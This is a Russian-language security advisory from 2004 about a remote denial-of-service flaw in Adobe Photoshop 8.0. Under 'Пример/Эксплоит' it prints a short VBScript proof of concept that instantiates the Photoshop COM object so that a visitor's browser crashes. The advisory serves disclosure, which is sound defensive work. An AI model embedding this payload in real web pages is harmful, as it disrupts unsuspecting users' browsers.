Security Lab

Удаленный отказ в обслуживании в Adobe Photoshop

Дата публикации:07.04.2004
Всего просмотров:934
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Adobe Photoshop 8.0

Описание: Уязвимость обнаружена в Adobe Photoshop. Удаленный пользователь может вызвать условия отказа в обслуживании на целевой системе.

Удаленный пользователь может сконструировать HTML, ссылающийся на Adobe Photoshop COM объект, чтобы аварийно завершить работу браузера целевого пользователя.

Пример/Эксплоит:

<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>

URL производителя: http://www.adobe.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E